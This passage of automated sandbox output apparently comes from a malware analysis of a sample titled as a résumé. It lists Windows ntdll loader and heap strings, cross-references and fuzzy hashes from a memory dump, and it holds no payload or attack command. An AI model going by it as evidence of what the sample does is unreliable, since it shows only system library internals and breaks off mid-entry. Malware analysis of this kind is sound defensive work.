                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                    • API String ID: 0-4009184096
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                    • API String ID: 0-2515994595
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                    • API String ID: 0-1700792311
                                    Strings
                                    • VerifierFlags, xrefs: 01578C50
                                    • VerifierDebug, xrefs: 01578CA5
                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01578A3D
                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01578A67
                                    • VerifierDlls, xrefs: 01578CBD
                                    • HandleTraces, xrefs: 01578C8F
                                    • AVRF: -*- final list of providers -*- , xrefs: 01578B8F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                    • API String ID: 0-3223716464
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                    • API String ID: 0-1109411897
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-792281065
                                    Strings
                                    • LdrpInitShimEngine, xrefs: 015499F4, 01549A07, 01549A30
                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01549A2A
                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01549A01
                                    • minkernel\ntdll\ldrinit.c, xrefs: 01549A11, 01549A3A
                                    • apphelp.dll, xrefs: 014E6496
                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015499ED
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-204845295
                                    Strings
                                    • RtlGetAssemblyStorageRoot, xrefs: 01562160, 0156219A, 015621BA
                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01562180
                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01562178
                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015621BF
                                    • SXS: %s() passed the empty activation context, xrefs: 01562165
                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0156219F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                    • API String ID: 0-861424205
                                    Strings
                                    • LdrpInitializeProcess, xrefs: 0152C6C4
                                    • minkernel\ntdll\ldrinit.c, xrefs: 0152C6C3
                                    • LdrpInitializeImportRedirection, xrefs: 01568177, 015681EB
                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 015681E5
                                    • Loading import redirection DLL: '%wZ', xrefs: 01568170
                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01568181, 015681F5
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                    • API String ID: 0-475462383
                                    APIs
                                      • Part of subcall function 01532DF0: LdrInitializeThunk.NTDLL ref: 01532DFA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BA3
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BB6
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D60
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D74
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                    • String ID:
                                    • API String ID: 1404860816-0
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                    • API String ID: 0-379654539
                                    Strings
                                    • LdrpInitializeProcess, xrefs: 01528422
                                    • minkernel\ntdll\ldrinit.c, xrefs: 01528421
                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0152855E
                                    • @, xrefs: 01528591
                                    Similarity
                                    • API ID:
                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-1918872054
                                    Strings
                                    • .Local, xrefs: 015228D8
                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015621D9, 015622B1
                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015622B6
                                    • SXS: %s() passed the empty activation context, xrefs: 015621DE
                                    Similarity
                                    • API ID:
                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                    • API String ID: 0-1239276146
                                    Strings
                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0156342A
                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01563437
                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01563456
                                    • RtlDeactivateActivationContext, xrefs: 01563425, 01563432, 01563451
                                    Similarity
                                    • API ID:
                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                    • API String ID: 0-1245972979
                                    Strings
                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01550FE5
                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0155106B
                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01551028
                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015510AE
                                    Similarity
                                    • API ID:
                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                    • API String ID: 0-1468400865
                                    Strings
                                    • minkernel\ntdll\ldrinit.c, xrefs: 0155A9A2
                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0155A992
                                    • apphelp.dll, xrefs: 01512462
                                    • LdrpDynamicShimModule, xrefs: 0155A998
                                    Similarity
                                    • API ID:
                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-176724104
                                    Strings
                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0150327D
                                    • HEAP[%wZ]: , xrefs: 01503255
                                    • HEAP: , xrefs: 01503264
                                    Similarity
                                    • API ID:
                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                    • API String ID: 0-617086771
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                    • API String ID: 0-4253913091
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: $@
                                    • API String ID: 0-1077428164
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: FilterFullPath$UseFilter$\??\
                                    • API String ID: 0-2779062949
                                    Strings
                                    • LdrpCheckModule, xrefs: 0155A117
                                    • Failed to allocated memory for shimmed module list, xrefs: 0155A10F
                                    • minkernel\ntdll\ldrinit.c, xrefs: 0155A121
                                    Similarity
                                    • API ID:
                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-161242083
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                    • API String ID: 0-1334570610
                                    Strings
                                    • minkernel\ntdll\ldrinit.c, xrefs: 015682E8
                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 015682DE
                                    • Failed to reallocate the system dirs string !, xrefs: 015682D7
                                    Similarity
                                    • API ID:
                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-1783798831
                                    Strings
                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015AC1C5
                                    • PreferredUILanguages, xrefs: 015AC212
                                    • @, xrefs: 015AC1F1
                                    Similarity
                                    • API ID:
                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                    • API String ID: 0-2968386058
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                    • API String ID: 0-1373925480
                                    Strings
                                    • LdrpCheckRedirection, xrefs: 0157488F
                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01574888
                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01574899
                                    Similarity
                                    • API ID:
                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                    • API String ID: 0-3154609507
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                    • API String ID: 0-2558761708
                                    Strings
                                    • Process initialization failed with status 0x%08lx, xrefs: 015720F3
                                    • minkernel\ntdll\ldrinit.c, xrefs: 01572104
                                    • LdrpInitializationFailure, xrefs: 015720FA
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-2986994758
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: #%u
                                    • API String ID: 48624451-232158463
                                    Strings
                                    • LdrResSearchResource Exit, xrefs: 014FAA25
                                    • LdrResSearchResource Enter, xrefs: 014FAA13
                                    Similarity
                                    • API ID:
                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                    • API String ID: 0-4066393604
                                    Strings
                                    • String ID: `$`
                                    Strings
                                    • API ID: InitializeThunk
                                    • String ID: Legacy$UEFI
                                    Strings
                                    • String ID: @$MUI
                                    Strings
                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014F063D
                                    • kLsE, xrefs: 014F0540
                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                    Strings
                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 014FA2FB
                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 014FA309
                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                    Strings
                                    • API ID: InitializeThunk
                                    • String ID: Cleanup Group$Threadpool!
                                    Strings
                                    • String ID: MUI
                                    Strings
                                    • String ID: GlobalTags
                                    Strings
                                    • String ID: .mui
                                    Strings
                                    • String ID: EXT-
                                    Strings
                                    • String ID: BinaryHash
                                    Strings
                                    • String ID: #
                                    Strings
                                    • String ID: BinaryName
                                    Strings
                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0157895E
                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                    • Instruction ID: e46685a11d76d1cbf170b71d48154fb549c1f05737d4effbf0b03d14ef890e03
                                    • Opcode Fuzzy Hash: b261f85a83982dc4d06ce092fe13acd37b521cfc0e0747fe7248e6b76b69472a
                                    • Instruction Fuzzy Hash: 4EA12031E0065AAFFB23CB98D859FAEBBA4FB40754F050526EE10AF285D7749D40CB91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 049da37d35d33addd820f4f28e1a4dc83b24391cfbc06da0df2727456efe7ead
                                    • Instruction ID: 00f7b995842ed5b0d29d3f7de0e7db4a557c7fc9d088c9b9f90b680232057ebb
                                    • Opcode Fuzzy Hash: 049da37d35d33addd820f4f28e1a4dc83b24391cfbc06da0df2727456efe7ead
                                    • Instruction Fuzzy Hash: E8A1BF71B007169FDB29CF69C490BAEB7E5FF94318F044029EA459F282DB34E911CB90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ee05abbeadd2c1f06f822fc1e9d6cbe18cb3cbaf30c18583dfd3a5159a213ad
                                    • Instruction ID: 809aca35acb1c36471df1365cd909b5f404662b2aba9880adf6dd855b448d681
                                    • Opcode Fuzzy Hash: 0ee05abbeadd2c1f06f822fc1e9d6cbe18cb3cbaf30c18583dfd3a5159a213ad
                                    • Instruction Fuzzy Hash: 04A1CC72A146429FD726DF98C990F2ABBE9FF98B04F05092CE585DF651C334E801CB91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                    • Instruction ID: 8deee1556c917ffa55ff6fbed47b31586d5fa88ddee4b24e3c9ba1668a3d5107
                                    • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                    • Instruction Fuzzy Hash: BDB12771E0061ADFDF29CFA9C880AADBBB5FF98710F148169E915AB354D730A941CF90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 46bde8d33d053c49ad2c2c80c649f75b463c16d88a86a9762d3d0776d99687d7
                                    • Instruction ID: d8b0f527a69d8d8044ac07a127ccb0100b239fbd4d1b7e826bd1c7dbee0039f7
                                    • Opcode Fuzzy Hash: 46bde8d33d053c49ad2c2c80c649f75b463c16d88a86a9762d3d0776d99687d7
                                    • Instruction Fuzzy Hash: A8918F71D00616AFEB15CFA8E895BAEBBB5BB48710F154169E610AF241D734E900DBA0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a576f7706ef5b26e2c5659cf40609fcfa523fb71bbf91bc004afcc8250b7b30a
                                    • Instruction ID: 3559f1066541a46eb4427cc2f37fa24df9031f9878a44d5341d99c2dcbacb8ce
                                    • Opcode Fuzzy Hash: a576f7706ef5b26e2c5659cf40609fcfa523fb71bbf91bc004afcc8250b7b30a
                                    • Instruction Fuzzy Hash: 9E911531A00616CBEB26DB98C445B7DBBF1FB94714F25486AED059F2C0E738D901CB61
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22f8e991638fe4b36c92bb6bc4aa6f59f2ba76a733ba4c50b7ab4458fd1faa52
                                    • Instruction ID: 44cfcf87c20bb94048d93a26e8883dfe5148d5ff50798382c3dddb8d76554e5f
                                    • Opcode Fuzzy Hash: 22f8e991638fe4b36c92bb6bc4aa6f59f2ba76a733ba4c50b7ab4458fd1faa52
                                    • Instruction Fuzzy Hash: 418182B1A0061A9FDB18CF69D940BBEBBF9FB48704F04852EE455DB640E334D940CBA4
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                    • Instruction ID: 5d7d1d2254cbd9f9e6f042a73faa1c8dc3becb978a05d3cf2cae381833c94852
                                    • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                    • Instruction Fuzzy Hash: 1A816E71A0020A9FDF19CF98C8C0AEEBBF6BF84210F188569E9169F345DB34E901CB50
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5c4c353a4cd88e060368be20337e174da1fca86ae4958c192d40961577b945af
                                    • Instruction ID: 83465400f529f699a9fef0b2edd2e5dc1d9f2d4e6e00bdb07bdfca18b88a1dc7
                                    • Opcode Fuzzy Hash: 5c4c353a4cd88e060368be20337e174da1fca86ae4958c192d40961577b945af
                                    • Instruction Fuzzy Hash: C0816371900619EFDB25CFA9C881BEEBBF9FF89354F104429E555AB250D730AC45CBA0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b7f9f04767a4465cbb1d7151d67ba958b762f1f2a14b91db50ba5c3d7335bef7
                                    • Instruction ID: 6f530f32937ece02563284c62f7d1095d25aaf329febe21a2e9c2196a1d46a66
                                    • Opcode Fuzzy Hash: b7f9f04767a4465cbb1d7151d67ba958b762f1f2a14b91db50ba5c3d7335bef7
                                    • Instruction Fuzzy Hash: 9071AC75D00629DBCB268F99C8A07BEBBF5FF59710F14465AE852AF390D3749804CBA0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f654462894a543da78bb43dfa5620a449a12294168fc54fd09ffd17c8d68eb9d
                                    • Instruction ID: e36d3483b6f1a56a873a9f64136ab8e757630680432232dbce395c5d385f77be
                                    • Opcode Fuzzy Hash: f654462894a543da78bb43dfa5620a449a12294168fc54fd09ffd17c8d68eb9d
                                    • Instruction Fuzzy Hash: 74710470D40205EFDB24CFD9DA54A9EBBFAFFA0340F89415AE214AF258C7B29944DB14
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59823c148fcbe82b13a479125772521094d992cdaea2b60a2ee8bee5744c2696
                                    • Instruction ID: ee689fa89b979fea1857ff72353f7491b30d161f1850bd72de601ba39d838f64
                                    • Opcode Fuzzy Hash: 59823c148fcbe82b13a479125772521094d992cdaea2b60a2ee8bee5744c2696
                                    • Instruction Fuzzy Hash: 7971DF356042428FD312DF68C898B6AB7E5FF84310F0585AAE899CF392DB34D846CB91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                    • Instruction ID: 249e531445ab788e18ff8cb8b7968a63e0b251bd50d007c22f6a6f9b1d601637
                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                    • Instruction Fuzzy Hash: 71716D71A0061AEFDB11DFA9D985A9EBBF9FF88700F104569E505EB290DB34EA01CB50
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 572ab926d126fb904799269c973443ff79ba7b21833444bb26c191c6233ca750
                                    • Instruction ID: 1cc37d36d4c0f02c5dc8476f51a710b4126c086708f8fde2cb56a1a2706429f0
                                    • Opcode Fuzzy Hash: 572ab926d126fb904799269c973443ff79ba7b21833444bb26c191c6233ca750
                                    • Instruction Fuzzy Hash: 9371E732200B02AFE732AF18C895F6E77E6FF80714F144918E256AF2A1DB75E944CB50
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae4cf09f001411f125bf722768023cb9bb49da915a86f7452b7ceaca94d7ab43
                                    • Instruction ID: 07a7118c45feec691d752f25bad156713b0615e53a92bf13543d2de295b5c2f4
                                    • Opcode Fuzzy Hash: ae4cf09f001411f125bf722768023cb9bb49da915a86f7452b7ceaca94d7ab43
                                    • Instruction Fuzzy Hash: AE710871E0060ABFDB16DFD4C881FEEBBB8FB54750F104569A611AB290D774AA05CBA0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 313534985536813d3127ef1a1125374d01c410036fc806bb6da01261654e8864
                                    • Instruction ID: c2cdf1f06d0d34cfe71c4c3ffbc903ffbf5088ff4aef8b5b9a5aa89054b750e6
                                    • Opcode Fuzzy Hash: 313534985536813d3127ef1a1125374d01c410036fc806bb6da01261654e8864
                                    • Instruction Fuzzy Hash: E4516E72544612AFD722DA68C844A5FBBE8FBC5750F414929BA80DF150E770ED09CBA2
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f72b25e361b2c621db86bcc2d9f5095498d1af837732ff1aaa9450fc93d113b
                                    • Instruction ID: b500a294b1cabf5a80a1b2b2362f88ec47320649d137d652c2cea0e6e1951062
                                    • Opcode Fuzzy Hash: 7f72b25e361b2c621db86bcc2d9f5095498d1af837732ff1aaa9450fc93d113b
